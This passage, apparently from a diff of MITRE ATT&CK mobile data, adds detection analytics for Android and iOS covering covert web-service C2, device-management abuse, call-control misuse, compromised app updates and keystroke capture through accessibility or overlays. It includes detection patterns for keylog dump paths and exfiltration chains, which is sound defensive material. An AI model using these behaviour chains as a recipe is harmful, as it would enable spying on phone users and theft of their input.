+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "AppState=background when bidirectional exchange with public web-service domain began and no foreground transition occurred between retrieval and outbound write"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "App identity performing bidirectional exchange was unmanaged, outside approved app baseline, or not permitted to use detected public web-service class for read/write operations"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between retrieval and outbound write over the same web-service class."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved app identities vary by organization, business unit, and device group."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Some apps legitimately perform read/write operations against collaboration, storage, or messaging services."
+                        },
+                        {
+                            "field": "AllowedReadWriteMappings",
+                            "description": "Defines which apps are expected to both retrieve and submit content to a given public service class."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close the bidirectional exchange must be to user activity to be considered expected."
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Allowed recurrence interval for repeated bidirectional exchanges varies by app type."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Some apps should only perform read/write web interactions while foregrounded."
+                        },
+                        {
+                            "field": "InboundOutboundRatioThreshold",
+                            "description": "Expected ratio of response size to outbound write size varies by legitimate app workflow."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-03-18 16:14:55.614000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--c08bd552-98fd-446d-b848-3c43b3b766f1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0700#AN1817",
+                            "external_id": "AN1817"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1817",
+                    "description": "The defender correlates repeated retrieval and outbound submission activity from a supervised device or managed iOS app to the same legitimate public web-service class where the two-way exchange does not fit the bundle's approved role or expected background-refresh model. The strongest iOS evidence is managed-app or device-attributed communication to collaboration, storage, messaging, social, or generic HTTPS platforms where inbound content fetches are followed by outbound writes, uploads, updates, or message submissions within a short window, especially when occurring during background refresh, while the device is locked, or without recent user interaction. Because direct local runtime visibility is weaker than Android, the primary analytic is anchored on network directionality plus supervised managed-app and device-state context.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "VPN:MobileProxy",
+                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "DeviceLockState=locked during inbound retrieval and subsequent outbound write sequence to public web-service platform"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "LastUserInteractionDelta exceeded threshold before retrieve-then-write exchange to public web-service domain from same app identity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "BackgroundRefresh or background activity was active when retrieve-then-write exchange with public web-service domain occurred"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Bundle performing bidirectional exchange was not present in approved managed-app baseline or was not permitted to use detected public web-service class for read/write operations"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between retrieval and outbound write over the same public web-service class."
+                        },
+                        {
+                            "field": "SupervisedRequired",
+                            "description": "Strongest app-governance and bundle-baseline analytics depend on supervised iOS devices."
+                        },
+                        {
+                            "field": "AllowedManagedApps",
+                            "description": "Approved managed bundle identities vary by organization and device profile."
+                        },
+                        {
+                            "field": "AllowedServiceClasses",
+                            "description": "Some managed apps legitimately perform bidirectional exchanges with collaboration, storage, or messaging services."
+                        },
+                        {
+                            "field": "AllowedReadWriteMappings",
+                            "description": "Defines which bundles are expected to both retrieve and submit content to a given public service class."
+                        },
+                        {
+                            "field": "BackgroundRefreshBaseline",
+                            "description": "Expected background read/write network behavior differs across managed app categories."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Defines how close the bidirectional exchange must be to user activity to be considered expected."
+                        },
+                        {
+                            "field": "BeaconIntervalTolerance",
+                            "description": "Allowed recurrence interval for repeated bidirectional exchanges varies by bundle type."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-18 16:25:11.215000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--40066e48-f70c-4fbb-a2cf-d7a385171edb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0702#AN1820",
+                            "external_id": "AN1820"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1820",
+                    "description": "Defender observes anomalous access to remote device management or enterprise mobility management control planes followed by device-state queries, location requests, or management actions inconsistent with user role, historical behavior, or device ownership context.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to device management or enterprise mobility management consoles"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
+                            "name": "saas:MDM",
+                            "channel": "Device lookup, location query, or remote management operation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "RoleDeviationThreshold",
+                            "description": "Defines acceptable variance between user privileges and management actions"
+                        },
+                        {
+                            "field": "GeoAccessAnomalyThreshold",
+                            "description": "Baseline deviation tolerance for management console access locations"
+                        },
+                        {
+                            "field": "DeviceOwnershipBaseline",
+                            "description": "Expected mapping of users to managed devices"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-02-24 17:35:08.607000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--6e3a93db-d2a6-43b7-9aa6-4dcf972f5e53",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0702#AN1821",
+                            "external_id": "AN1821"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1821",
+                    "description": "Defender observes anomalous authentication or session activity targeting remote device management services followed by device-tracking queries, device-state requests, or remote actions inconsistent with established user-device relationships or operational patterns.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
+                            "name": "saas:MDM",
+                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
+                            "name": "saas:MDM",
+                            "channel": "Device lookup, location query, or remote management operation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "UserDeviceRelationshipDeviation",
+                            "description": "Defines acceptable deviation from known user-device mappings"
+                        },
+                        {
+                            "field": "SessionAnomalyThreshold",
+                            "description": "Baseline deviation tolerance for management sessions"
+                        },
+                        {
+                            "field": "QueryFrequencyThreshold",
+                            "description": "Threshold for excessive device tracking or lookup activity"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.378000+00:00\", \"old_value\": \"2026-02-24 17:34:54.559000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--d2cf1cf2-7b11-4018-b5bc-fbd48633f869",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0703#AN1822",
+                            "external_id": "AN1822"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1822",
+                    "description": "The defender correlates call-control capability or telecom role state with subsequent unauthorized call initiation, answer, block, redirect, or concealment behavior by an application outside expected telephony workflows. The analytic prioritizes Android-observable control-plane effects: dangerous or role-gated call-control permissions, default dialer or ConnectionService-related role changes, telecom framework invocation for call placement or handling, write activity against call-log records, and call-control activity occurring from background or locked-device context without recent user interaction.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app granted call-control-relevant permissions or telecom role state inconsistent with approved enterprise function before call-control activity"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Default phone or telecom-handling role changes to non-baselined application or managed app unexpectedly becomes dialer/call-handling app during call-control phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between permission or role state, call-control action, call-log mutation, and follow-on network communication"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to initiate or manage calls, such as default dialers, carrier tools, enterprise communications apps, or approved call-screening apps"
+                        },
+                        {
+                            "field": "AllowedDialerRoles",
+                            "description": "Approved packages allowed to become default dialer or telecom-managing app on managed devices"
+                        },
+                        {
+                            "field": "AllowedDestinationList",
+                            "description": "Approved network destinations associated with legitimate VoIP, carrier, or enterprise communications workflows"
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether call-control actions should occur only during active user-driven workflows"
+                        },
+                        {
+                            "field": "CallLogModificationThreshold",
+                            "description": "Number of call-log insert, update, or delete operations within a short interval required before alerting"
+                        },
+                        {
+                            "field": "CallActionRateThreshold",
+                            "description": "Maximum expected rate of call placement, answer, redirect, or block actions for legitimate app behavior"
+                        },
+                        {
+                            "field": "HighRiskNumberPatterns",
+                            "description": "Environment-specific list of suspicious, premium-rate, or adversary-known phone-number patterns"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-04-09 17:53:31.236000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--ffcee6e2-02dd-4053-92a3-8600dd70445e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.384000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0704#AN1823",
+                            "external_id": "AN1823"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1823",
+                    "description": "A legitimate-seeming application or update is installed through an expected or previously trusted path, but shortly after first run or update the application exhibits new runtime behavior, sensor use, file staging, or network communications inconsistent with its historical baseline, documented role, or prior version. The defender specifically looks for behaviors commonly introduced by compromised third-party libraries or manipulated build tooling, such as unexpected background service activation, first-seen framework use, new permissions exercised, novel network destinations, or dropped local artifacts not aligned to the app's expected function.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "android:MDMLog",
+                            "channel": "Managed app distribution, enterprise catalog trust, and update policy remain expected while a known package exhibits materially different post-install or post-update behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Known application version declares, gains, or first exercises storage, communications, accessibility, advertising, analytics, overlay, or sensor-adjacent capability inconsistent with prior version baseline or business role"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "android:MDMLog",
+                            "channel": "Newly installed or updated application launches background service, becomes active without recent user interaction, or executes immediately after update in a pattern inconsistent with baseline"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum span between install/update or first launch and the first suspicious behavior drift."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Apps legitimately expected to add services, libraries, or destinations because of approved releases."
+                        },
+                        {
+                            "field": "AllowedVersionChangeWindow",
+                            "description": "Grace period after an approved release during which limited behavior drift may be expected."
+                        },
+                        {
+                            "field": "CapabilityDriftThreshold",
+                            "description": "Threshold for how many new permissions or capabilities are tolerated before behavior is considered suspicious."
+                        },
+                        {
+                            "field": "SensorDriftThreshold",
+                            "description": "Threshold for newly used sensors or privacy-sensitive resources that are tolerated for a known app."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether certain framework or sensor behaviors should only be treated as suspicious when they occur without visible user interaction."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Time threshold for distinguishing autonomous post-update execution from normal first-run user activity."
+                        },
+                        {
+                            "field": "DestinationAllowList",
+                            "description": "Expected domains, CDNs, telemetry services, or APIs associated with approved app updates and known SDKs."
+                        },
+                        {
+                            "field": "BehaviorBaselinePopulation",
+                            "description": "Devices, versions, or user cohorts used to define normal behavior for the app."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.384000+00:00\", \"old_value\": \"2026-03-13 23:48:31.416000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7a209f60-7f43-407f-b5bd-7877e10222ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.379000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0704#AN1824",
+                            "external_id": "AN1824"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1824",
+                    "description": "A legitimate-seeming app or update arrives through an expected or trusted distribution path, but the delivered application begins showing new entitlement exercise, background activity, framework use, sensor access, or network behavior inconsistent with its prior baseline or documented role. Because direct inspection of compromised dependencies or developer tooling is weaker on iOS, the defender emphasizes supervised-device app inventory, post-update behavior drift, new first-run or background patterns, and downstream communications that suggest compromised embedded libraries or manipulated build outputs.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "iOS:MDMLog",
+                            "channel": "Managed app distribution, supervised install posture, or provisioning trust context remains expected while a known app exhibits materially different behavior after version change"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "iOS:MDMLog",
+                            "channel": "Known application version declares, activates, or exhibits new entitlements, privacy permissions, or capability use inconsistent with prior baseline or business role"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Updated or newly delivered application wakes, foregrounds, refreshes, or becomes active shortly after version change with weak recent user interaction"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Maximum span between install/version change and first suspicious post-delivery behavior."
+                        },
+                        {
+                            "field": "SupervisedOnly",
+                            "description": "Whether the analytic should only apply to supervised devices with high-confidence managed app telemetry."
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Approved apps expected to change capabilities, services, or destinations because of legitimate releases."
+                        },
+                        {
+                            "field": "AllowedVersionChangeWindow",
+                            "description": "Grace period after an approved release during which limited behavior drift may be expected."
+                        },
+                        {
+                            "field": "CapabilityDriftThreshold",
+                            "description": "Threshold for how much entitlement or capability drift is tolerated for a known app."
+                        },
+                        {
+                            "field": "SensorDriftThreshold",
+                            "description": "Threshold for newly used sensors or privacy-sensitive resources tolerated for a known app."
+                        },
+                        {
+                            "field": "ForegroundStateRequired",
+                            "description": "Whether certain behaviors should only be treated as suspicious when they occur without visible user interaction."
+                        },
+                        {
+                            "field": "RecentUserInteractionWindow",
+                            "description": "Threshold for distinguishing autonomous post-update activity from normal user-driven first-run behavior."
+                        },
+                        {
+                            "field": "DestinationAllowList",
+                            "description": "Expected domains, telemetry services, or APIs associated with approved app updates and known SDK behavior."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.379000+00:00\", \"old_value\": \"2026-03-16 15:56:09.700000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9b036696-9e1e-42b9-9bfd-3ae785e7e10e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0705#AN1825",
+                            "external_id": "AN1825"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1825",
+                    "description": "Defender observes an app gaining input-observation capability (AccessibilityService enablement, default IME set, draw-over-apps permission), then creating an intercept surface (overlay window, accessibility event stream consumption or IME keystroke callbacks), followed by persistence (local keylog/clipboard dump) and/or small, frequent network egress. Chain: capability/permission \u2192 listener/overlay activation \u2192 bursty input read events \u2192 local write \u2192 near-term exfil.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
+                            "name": "android:logcat",
+                            "channel": "Grant/activation of BIND_ACCESSIBILITY_SERVICE, BIND_INPUT_METHOD, SYSTEM_ALERT_WINDOW, POST_NOTIFICATIONS for <pkg>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "android:logcat",
+                            "channel": "Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Max time from input intercept to persist/exfil (e.g., 5\u201345s)."
+                        },
+                        {
+                            "field": "MinInputEventBurst",
+                            "description": "Minimum count of input events within window to flag harvesting (e.g., \u22655)."
+                        },
+                        {
+                            "field": "OverlayRequired",
+                            "description": "Require overlay creation if Accessibility not present (true/false)."
+                        },
+                        {
+                            "field": "PersistPathRegex",
+                            "description": "Regex for keylog/clipboard dump destinations in app container."
+                        },
+                        {
+                            "field": "ExfilDomainAllowlist",
+                            "description": "Known-good analytics/CDN endpoints to suppress FPs."
+                        },
+                        {
+                            "field": "UserContext",
+                            "description": "Foreground/background/Work Profile or Kiosk policy to scope alerts."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-01-29 18:28:31.071000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--7179bc7d-a2be-4ded-8c4f-88ec8f73e613",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.378000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0705#AN1826",
+                            "external_id": "AN1826"
+                        }
+                    ],
+                    "object_marking_refs": [
